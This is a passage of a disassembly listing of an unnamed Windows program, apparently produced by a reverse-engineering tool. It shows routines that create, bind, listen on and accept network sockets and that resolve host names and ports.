var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
push ebp
mov ebp, esp
sub esp, 18h
lea eax, [ebp+var_8]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_8]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_4042A4
push 1
pop eax
jmp short locret_4042F9
; ---------------------------------------------------------------------------
loc_4042A4: ; CODE XREF: sub_404279+24�j
push 0BB8h
push 0
lea eax, [ebp+var_8]
push eax
push offset dword_41EFD8
call sub_4050EA
add esp, 10h
mov [ebp+var_C], eax
push [ebp+var_10]
call sub_404CBB
pop ecx
cmp [ebp+var_C], 0
jz short loc_4042DA
cmp [ebp+var_C], 0FFFFFFFFh
jz short loc_4042DA
and [ebp+var_18], 0
jmp short loc_4042E1
; ---------------------------------------------------------------------------
loc_4042DA: ; CODE XREF: sub_404279+53�j
; sub_404279+59�j
mov [ebp+var_18], 1
loc_4042E1: ; CODE XREF: sub_404279+5F�j
mov eax, [ebp+var_18]
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_4042F6
push [ebp+var_C]
call sub_4053B1
pop ecx
loc_4042F6: ; CODE XREF: sub_404279+72�j
mov eax, [ebp+var_14]
locret_4042F9: ; CODE XREF: sub_404279+29�j
leave
retn
sub_404279 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4042FB proc near ; CODE XREF: sub_411D68+4�p
; sub_41349C+1FA�p ...
push ebp
mov ebp, esp
cmp dword_41E324, 0
jnz short loc_404327
call sub_404279
push eax
push offset dword_41E328
call sub_409C9D
pop ecx
pop ecx
push 1
push offset dword_41E324
call sub_409C9D
pop ecx
pop ecx
loc_404327: ; CODE XREF: sub_4042FB+A�j
mov eax, dword_41E328
pop ebp
retn
sub_4042FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40432E proc near ; CODE XREF: sub_40435B+6�p
; sub_4046BC+5D�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push 0
push 1
push 17h
call dword_417218 ; socket
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404350
push [ebp+var_4]
call sub_4053B1
pop ecx
loc_404350: ; CODE XREF: sub_40432E+17�j
xor eax, eax
cmp [ebp+var_4], 0FFFFFFFFh
setnz al
leave
retn
sub_40432E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40435B proc near ; CODE XREF: sub_4083AD:loc_4085D6�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
call sub_40432E
test eax, eax
jnz short loc_40436E
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_40436E: ; CODE XREF: sub_40435B+D�j
lea eax, [ebp+var_14]
push eax
call sub_404193
pop ecx
push 1
lea eax, [ebp+var_14]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_404392
xor eax, eax
jmp short locret_4043E7
; ---------------------------------------------------------------------------
loc_404392: ; CODE XREF: sub_40435B+31�j
push 0BB8h
push 2
lea eax, [ebp+var_14]
push eax
push offset dword_418A5C
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
push [ebp+var_C]
call sub_404CBB
pop ecx
cmp [ebp+var_8], 0
jz short loc_4043CB
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4043CB
mov [ebp+var_18], 1
jmp short loc_4043CF
; ---------------------------------------------------------------------------
loc_4043CB: ; CODE XREF: sub_40435B+5F�j
; sub_40435B+65�j
and [ebp+var_18], 0
loc_4043CF: ; CODE XREF: sub_40435B+6E�j
mov eax, [ebp+var_18]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4043E4
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_4043E4: ; CODE XREF: sub_40435B+7E�j
mov eax, [ebp+var_4]
locret_4043E7: ; CODE XREF: sub_40435B+11�j
; sub_40435B+35�j
leave
retn
sub_40435B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4043E9 proc near ; CODE XREF: sub_408B30:loc_408C9F�p
; sub_40CA29+231�p ...
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 20h
push offset dword_418A1C
lea eax, [ebp+var_1C]
push eax
call sub_416B3A ; strcpy
pop ecx
pop ecx
lea eax, [ebp+var_1C]
push eax
call sub_4105FB
pop ecx
push 7D0h
push 2
push offset a80 ; "80"
lea eax, [ebp+var_1C]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_404439
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_404439
mov [ebp+var_20], 1
jmp short loc_40443D
; ---------------------------------------------------------------------------
loc_404439: ; CODE XREF: sub_4043E9+3F�j
; sub_4043E9+45�j
and [ebp+var_20], 0
loc_40443D: ; CODE XREF: sub_4043E9+4E�j
mov eax, [ebp+var_20]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404452
push [ebp+var_8]
call sub_4053B1
pop ecx
loc_404452: ; CODE XREF: sub_4043E9+5E�j
mov eax, [ebp+var_4]
leave
retn
sub_4043E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404457 proc near ; CODE XREF: sub_404FE7+AF�p
; sub_4050EA+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
xor eax, eax
cmp [ebp+arg_4], 0
setz al
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push [ebp+arg_0]
call dword_417214 ; ioctlsocket
leave
retn
sub_404457 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40447B proc near ; CODE XREF: sub_40732D+22E�p
; sub_40732D+296�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 4004667Fh
push [ebp+arg_0]
call dword_417214 ; ioctlsocket
xor eax, eax
cmp [ebp+var_4], 0
setnz al
leave
retn
sub_40447B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40449C proc near ; CODE XREF: sub_40D871+5A1�p
; sub_411DC5+65�p
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_4044CC
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044CC: ; CODE XREF: sub_40449C+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DF18 ; getnameinfo
test eax, eax
jz short loc_4044F2
xor eax, eax
jmp short locret_4044F5
; ---------------------------------------------------------------------------
loc_4044F2: ; CODE XREF: sub_40449C+50�j
push 1
pop eax
locret_4044F5: ; CODE XREF: sub_40449C+2E�j
; sub_40449C+54�j
leave
retn
sub_40449C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4044F7 proc near ; CODE XREF: sub_40732D+DD�p
; sub_4129CA+29�p ...
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 84h
mov [ebp+var_84], 80h
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_404527
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_404527: ; CODE XREF: sub_4044F7+2A�j
push 2
push 0
push 0
push 100h
push [ebp+arg_4]
push [ebp+var_84]
lea eax, [ebp+var_80]
push eax
call dword_41DF18 ; getnameinfo
test eax, eax
jz short loc_40454D
xor eax, eax
jmp short locret_404550
; ---------------------------------------------------------------------------
loc_40454D: ; CODE XREF: sub_4044F7+50�j
push 1
pop eax
locret_404550: ; CODE XREF: sub_4044F7+2E�j
; sub_4044F7+54�j
leave
retn
sub_4044F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404552 proc near ; CODE XREF: sub_41331E+A6�p
; sub_415F69+256�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417240 ; getsockname
cmp eax, 0FFFFFFFFh
jnz short loc_404582
xor eax, eax
jmp short locret_4045B0
; ---------------------------------------------------------------------------
loc_404582: ; CODE XREF: sub_404552+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_4045B0: ; CODE XREF: sub_404552+2E�j
leave
retn
sub_404552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4045B2 proc near ; CODE XREF: sub_4143B0+191�p
; sub_415F69+20A�p
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 88h
mov [ebp+var_88], 80h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_80]
push eax
push [ebp+arg_0]
call dword_417210 ; getpeername
cmp eax, 0FFFFFFFFh
jnz short loc_4045E2
xor eax, eax
jmp short locret_404610
; ---------------------------------------------------------------------------
loc_4045E2: ; CODE XREF: sub_4045B2+2A�j
lea eax, [ebp+var_80]
mov [ebp+var_84], eax
push 0Ah
push [ebp+arg_4]
mov eax, [ebp+var_84]
mov ax, [eax+2]
push eax
call dword_417238 ; ntohs
movzx eax, ax
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
push 1
pop eax
locret_404610: ; CODE XREF: sub_4045B2+2E�j
leave
retn
sub_4045B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404612 proc near ; CODE XREF: sub_40D871+69C�p
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = byte ptr -404h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40Ch
lea eax, [ebp+var_408]
push eax
push 0
push 0
push [ebp+arg_0]
call dword_41DF14 ; getaddrinfo
test eax, eax
jnz loc_4046B8
mov eax, [ebp+var_408]
mov [ebp+var_40C], eax
loc_404643: ; CODE XREF: sub_404612+98�j
cmp [ebp+var_40C], 0
jz short loc_4046AC
push 2
push 0
push 0
push 401h
lea eax, [ebp+var_404]
push eax
mov eax, [ebp+var_40C]
push dword ptr [eax+10h]
mov eax, [ebp+var_40C]
push dword ptr [eax+18h]
call dword_41DF18 ; getnameinfo
test eax, eax
jnz short loc_40469B
mov eax, [ebp+var_40C]
cmp dword ptr [eax+4], 2
jnz short loc_40469B
lea eax, [ebp+var_404]
push eax
push [ebp+arg_4]
call sub_416B3A ; strcpy
pop ecx
pop ecx
mov al, 1
jmp short locret_4046BA
; ---------------------------------------------------------------------------
loc_40469B: ; CODE XREF: sub_404612+66�j
; sub_404612+72�j
mov eax, [ebp+var_40C]
mov eax, [eax+1Ch]
mov [ebp+var_40C], eax
jmp short loc_404643
; ---------------------------------------------------------------------------
loc_4046AC: ; CODE XREF: sub_404612+38�j
push [ebp+var_408]
call dword_41DF1C ; freeaddrinfo
loc_4046B8: ; CODE XREF: sub_404612+1F�j
xor al, al
locret_4046BA: ; CODE XREF: sub_404612+87�j
leave
retn
sub_404612 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4046BC proc near ; CODE XREF: sub_4020C2+124�p
; sub_403DF3+36�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
xor eax, eax
test eax, eax
jz short loc_4046D1
mov [ebp+var_3C], 2
jmp short loc_4046D8
; ---------------------------------------------------------------------------
loc_4046D1: ; CODE XREF: sub_4046BC+A�j
mov [ebp+var_3C], 1
loc_4046D8: ; CODE XREF: sub_4046BC+13�j
mov eax, [ebp+var_3C]
mov [ebp+var_8], eax
push 1008h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4046F9
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_4046F9: ; CODE XREF: sub_4046BC+34�j
mov eax, [ebp+var_2C]
and dword ptr [eax], 0
mov eax, [ebp+var_2C]
and dword ptr [eax+804h], 0
push 20h
push 0
lea eax, [ebp+var_28]
push eax
call sub_416B6A ; memset
add esp, 0Ch
call sub_40432E
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
mov [ebp+var_24], eax
mov eax, [ebp+var_8]
mov [ebp+var_20], eax
mov [ebp+var_28], 5
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
push 0
call dword_41DF14 ; getaddrinfo
test eax, eax
jz short loc_40475D
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp locret_40486F
; ---------------------------------------------------------------------------
loc_40475D: ; CODE XREF: sub_4046BC+8F�j
mov eax, [ebp+var_30]
mov [ebp+var_4], eax
jmp short loc_40476E
; ---------------------------------------------------------------------------
loc_404765: ; CODE XREF: sub_4046BC+DD�j
; sub_4046BC+F1�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40476E: ; CODE XREF: sub_4046BC+A7�j
cmp [ebp+var_4], 0
jz loc_40484E
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call dword_417218 ; socket
mov [ebp+var_34], eax
cmp [ebp+var_34], 0FFFFFFFFh
jnz short loc_40479B
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_40479B: ; CODE XREF: sub_4046BC+DB�j
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 2
jz short loc_4047AF
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 17h
jz short loc_4047AF
jmp short loc_404765
; ---------------------------------------------------------------------------
loc_4047AF: ; CODE XREF: sub_4046BC+E6�j
; sub_4046BC+EF�j
mov eax, [ebp+arg_4]
and eax, 2
test eax, eax
jz short loc_4047D6
mov [ebp+var_38], 1
push 4
lea eax, [ebp+var_38]
push eax
push 4
push 0FFFFh
push [ebp+var_34]
call dword_417204 ; setsockopt
loc_4047D6: ; CODE XREF: sub_4046BC+FB�j
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_34]
call dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_4047FE
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_4047FE: ; CODE XREF: sub_4046BC+132�j
cmp [ebp+var_8], 1
jnz short loc_404822
push 32h
push [ebp+var_34]
call dword_417268 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_404822
push [ebp+var_34]
call sub_4053B1
pop ecx
jmp loc_404765
; ---------------------------------------------------------------------------
loc_404822: ; CODE XREF: sub_4046BC+146�j
; sub_4046BC+156�j
mov eax, [ebp+var_2C]
mov eax, [eax]
mov ecx, [ebp+var_2C]
mov edx, [ebp+var_34]
mov [ecx+eax*4+4], edx
mov eax, [ebp+var_2C]
mov eax, [eax]
inc eax
mov ecx, [ebp+var_2C]
mov [ecx], eax
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 200h
jnz short loc_404849
jmp short loc_40484E
; ---------------------------------------------------------------------------
loc_404849: ; CODE XREF: sub_4046BC+189�j
jmp loc_404765
; ---------------------------------------------------------------------------
loc_40484E: ; CODE XREF: sub_4046BC+B6�j
; sub_4046BC+18B�j
push [ebp+var_30]
call dword_41DF1C ; freeaddrinfo
mov eax, [ebp+var_2C]
cmp dword ptr [eax], 0
jnz short loc_40486C
push [ebp+var_2C]
call sub_416B4C ; free
pop ecx
xor eax, eax
jmp short locret_40486F
; ---------------------------------------------------------------------------
loc_40486C: ; CODE XREF: sub_4046BC+1A1�j
mov eax, [ebp+var_2C]
locret_40486F: ; CODE XREF: sub_4046BC+38�j
; sub_4046BC+9C�j ...
leave
retn
sub_4046BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404871 proc near ; CODE XREF: sub_411BBC+B0�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_40488F
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_40488F: ; CODE XREF: sub_404871+18�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+arg_0]
add eax, [ecx]
cmp eax, 200h
jbe short loc_4048AD
push [ebp+var_4]
call sub_404CBB
pop ecx
xor eax, eax
jmp short locret_4048ED
; ---------------------------------------------------------------------------
loc_4048AD: ; CODE XREF: sub_404871+2D�j
mov eax, [ebp+var_4]
mov eax, [eax]
shl eax, 2
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*4+4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov ecx, [ebp+var_4]
add eax, [ecx]
mov ecx, [ebp+arg_0]
mov [ecx], eax
push [ebp+var_4]
call sub_416B4C ; free
pop ecx
push 1
pop eax
locret_4048ED: ; CODE XREF: sub_404871+1C�j
; sub_404871+3A�j
leave
retn
sub_404871 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4048EF proc near ; CODE XREF: sub_4020C2+22E�p
; sub_403DF3+8D�p ...
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0A8h
push esi
mov [ebp+var_4], 80h
and [ebp+var_8C], 0
jmp short loc_404916
; ---------------------------------------------------------------------------
loc_404909: ; CODE XREF: sub_4048EF+133�j
; sub_4048EF:loc_404A32�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404916: ; CODE XREF: sub_4048EF+18�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404A37
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404A32
loc_40494A: ; CODE XREF: sub_4048EF+100�j
and [ebp+var_9C], 0
jmp short loc_404960
; ---------------------------------------------------------------------------
loc_404953: ; CODE XREF: sub_4048EF:loc_4049E6�j
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
loc_404960: ; CODE XREF: sub_4048EF+62�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_9C]
cmp ecx, [eax+804h]
jnb short loc_4049EB
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_4049E6
loc_404990: ; CODE XREF: sub_4048EF+E0�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_9C], eax
jnb short loc_4049D1
mov eax, [ebp+var_9C]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_9C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_9C]
inc eax
mov [ebp+var_9C], eax
jmp short loc_404990
; ---------------------------------------------------------------------------
loc_4049D1: ; CODE XREF: sub_4048EF+B1�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_4049EB
; ---------------------------------------------------------------------------
loc_4049E6: ; CODE XREF: sub_4048EF+9F�j
jmp loc_404953
; ---------------------------------------------------------------------------
loc_4049EB: ; CODE XREF: sub_4048EF+80�j
; sub_4048EF+F5�j
xor eax, eax
test eax, eax
jnz loc_40494A
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call dword_4171FC ; accept
mov [ebp+var_98], eax
cmp [ebp+var_98], 0FFFFFFFFh
jnz short loc_404A27
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A27: ; CODE XREF: sub_4048EF+131�j
mov eax, [ebp+var_98]
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404A32: ; CODE XREF: sub_4048EF+55�j
jmp loc_404909
; ---------------------------------------------------------------------------
loc_404A37: ; CODE XREF: sub_4048EF+32�j
mov eax, [ebp+arg_0]
and dword ptr [eax+804h], 0
and [ebp+var_8C], 0
jmp short loc_404A57
; ---------------------------------------------------------------------------
loc_404A4A: ; CODE XREF: sub_4048EF+21D�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404A57: ; CODE XREF: sub_4048EF+159�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404B11
loc_404A68: ; CODE XREF: sub_4048EF+217�j
and [ebp+var_A0], 0
jmp short loc_404A7E
; ---------------------------------------------------------------------------
loc_404A71: ; CODE XREF: sub_4048EF:loc_404AB0�j
mov eax, [ebp+var_A0]
inc eax
mov [ebp+var_A0], eax
loc_404A7E: ; CODE XREF: sub_4048EF+180�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnb short loc_404AB2
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404AB0
jmp short loc_404AB2
; ---------------------------------------------------------------------------
loc_404AB0: ; CODE XREF: sub_4048EF+1BD�j
jmp short loc_404A71
; ---------------------------------------------------------------------------
loc_404AB2: ; CODE XREF: sub_4048EF+19E�j
; sub_4048EF+1BF�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A0]
cmp ecx, [eax+804h]
jnz short loc_404B02
mov eax, [ebp+arg_0]
cmp dword ptr [eax+804h], 200h
jnb short loc_404B02
mov eax, [ebp+var_A0]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+4]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
loc_404B02: ; CODE XREF: sub_4048EF+1D2�j
; sub_4048EF+1E1�j
xor eax, eax
test eax, eax
jnz loc_404A68
jmp loc_404A4A
; ---------------------------------------------------------------------------
loc_404B11: ; CODE XREF: sub_4048EF+173�j
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_94], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_90], edx
lea eax, [ebp+var_94]
push eax
push 0
push 0
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call dword_41722C ; select
mov [ebp+var_88], eax
cmp [ebp+var_88], 0
jnz short loc_404B71
or eax, 0FFFFFFFFh
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B71: ; CODE XREF: sub_4048EF+278�j
cmp [ebp+var_88], 0FFFFFFFFh
jnz short loc_404B81
xor eax, eax
jmp loc_404CB8
; ---------------------------------------------------------------------------
loc_404B81: ; CODE XREF: sub_4048EF+289�j
and [ebp+var_8C], 0
jmp short loc_404B97
; ---------------------------------------------------------------------------
loc_404B8A: ; CODE XREF: sub_4048EF+3B4�j
; sub_4048EF:loc_404CB0�j
mov eax, [ebp+var_8C]
inc eax
mov [ebp+var_8C], eax
loc_404B97: ; CODE XREF: sub_4048EF+299�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8C]
cmp ecx, [eax]
jnb loc_404CB5
mov eax, [ebp+arg_0]
add eax, 804h
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz loc_404CB0
loc_404BCB: ; CODE XREF: sub_4048EF+381�j
and [ebp+var_A8], 0
jmp short loc_404BE1
; ---------------------------------------------------------------------------
loc_404BD4: ; CODE XREF: sub_4048EF:loc_404C67�j
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
loc_404BE1: ; CODE XREF: sub_4048EF+2E3�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_A8]
cmp ecx, [eax+804h]
jnb short loc_404C6C
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8C]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+808h]
cmp eax, [esi+edx*4+4]
jnz short loc_404C67
loc_404C11: ; CODE XREF: sub_4048EF+361�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
cmp [ebp+var_A8], eax
jnb short loc_404C52
mov eax, [ebp+var_A8]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_A8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+80Ch]
mov [ecx+eax*4+808h], edx
mov eax, [ebp+var_A8]
inc eax
mov [ebp+var_A8], eax
jmp short loc_404C11
; ---------------------------------------------------------------------------
loc_404C52: ; CODE XREF: sub_4048EF+332�j
mov eax, [ebp+arg_0]
mov eax, [eax+804h]
dec eax
mov ecx, [ebp+arg_0]
mov [ecx+804h], eax
jmp short loc_404C6C
; ---------------------------------------------------------------------------
loc_404C67: ; CODE XREF: sub_4048EF+320�j
jmp loc_404BD4
; ---------------------------------------------------------------------------
loc_404C6C: ; CODE XREF: sub_4048EF+301�j
; sub_4048EF+376�j
xor eax, eax
test eax, eax
jnz loc_404BCB
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_84]
push eax
mov eax, [ebp+var_8C]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
call dword_4171FC ; accept
mov [ebp+var_A4], eax
cmp [ebp+var_A4], 0FFFFFFFFh
jnz short loc_404CA8
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CA8: ; CODE XREF: sub_4048EF+3B2�j
mov eax, [ebp+var_A4]
jmp short loc_404CB8
; ---------------------------------------------------------------------------
loc_404CB0: ; CODE XREF: sub_4048EF+2D6�j
jmp loc_404B8A
; ---------------------------------------------------------------------------
loc_404CB5: ; CODE XREF: sub_4048EF+2B3�j
or eax, 0FFFFFFFFh
loc_404CB8: ; CODE XREF: sub_4048EF+13E�j
; sub_4048EF+27D�j ...
pop esi
leave
retn
sub_4048EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CBB proc near ; CODE XREF: sub_4020C2+175�p
; sub_4020C2+25F�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404CCC
; ---------------------------------------------------------------------------
loc_404CC5: ; CODE XREF: sub_404CBB+3E�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404CCC: ; CODE XREF: sub_404CBB+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jnb short loc_404CFB
cmp dword_41DEC8, 0
jz short loc_404CE9
mov eax, [ebp+arg_0]
cmp dword ptr [eax], 64h
jbe short loc_404CE9
jmp short loc_404CFB
; ---------------------------------------------------------------------------
loc_404CE9: ; CODE XREF: sub_404CBB+22�j
; sub_404CBB+2A�j
